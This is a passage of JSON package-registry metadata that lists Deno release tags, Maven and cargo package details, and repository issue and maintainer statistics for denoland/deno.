/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T10:14:52.651Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.696275283753454,"dependent_packages_count":42.45229214719405,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.074283715473754},"purl":"pkg:maven/org.mvnpm.at.deno/win32-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:win32-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:win32-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:win32-x64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14867370,"name":"deno_v8","ecosystem":"cargo","description":"JavaScript engine facade for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":3,"first_release_published_at":"2026-08-04T16:32:30.542Z","latest_release_published_at":"2026-08-27T15:19:22.343Z","latest_release_number":"0.3.0","last_synced_at":"2026-09-07T22:59:42.731Z","created_at":"2026-08-04T16:47:01.521Z","updated_at":"2026-09-07T22:59:42.731Z","registry_url":"https://crates.io/crates/deno_v8/","install_command":"cargo install deno_v8","documentation_url":"https://docs.rs/deno_v8/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and 